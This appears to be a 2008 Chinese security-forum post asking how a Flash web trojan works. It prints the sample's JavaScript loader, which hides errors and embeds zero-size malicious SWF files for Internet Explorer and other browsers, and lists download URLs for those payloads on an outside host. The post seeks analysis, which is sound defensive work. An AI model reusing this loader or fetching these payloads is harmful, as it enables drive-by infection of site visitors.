-
-
[旧帖]
[讨论]一个奇怪的FLASH网马,有别与12个文件那种
0.00雪花
-
发表于:
2008-10-21 12:06
3431
-
[旧帖] [讨论]一个奇怪的FLASH网马,有别与12个文件那种
0.00雪花
无意中得到一个FLASH网马样本,swf解密后只有ly20088.asp?不多的明码,没搞清楚这个网马是怎么实现的。查了下资料,有个牛人也分析过,是一种合法SWF套用非法的SWF文件,可是当时他手上没有样本,就没继续分析下去。请问各位有什么看法?
代码如下:
<script>
document.writeln("<script>function init(){window.status=\"\";}window.onload = init;");
document.writeln("window.onerror=function(){return true;}");
document.writeln("");
document.writeln("if(navigator.userAgent.toLowerCase().indexOf(\"msie\")>0)");
document.writeln("{");
document.writeln("document.write(\'<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=4,0,19,0\" width=\"0\" height=\"0\" align=\"middle\">\');");
document.writeln("document.write(\'<param name=\"allowScriptAccess\" value=\"sameDomain\"\/>\');");
document.writeln("document.write(\'<param name=\"movie\" value=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<param name=\"quality\" value=\"high\"\/>\');");
document.writeln("document.write(\'<param name=\"bgcolor\" value=\"#ffffff\"\/>\');");
document.writeln("document.write(\'<embed src=\"ifff.swf\"\/>\');");
document.writeln("document.write(\'<\/object>\');");
document.writeln("}");
document.writeln("else{document.write(\'<EMBED src=\"ffff.swf\" width=0 height=0>\');}");
document.writeln("<\/script>")
</script>
swf下载地址:http://usa.ccxtt.com/ifff.swf http://usa.ccxtt.com/ffff.swf
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课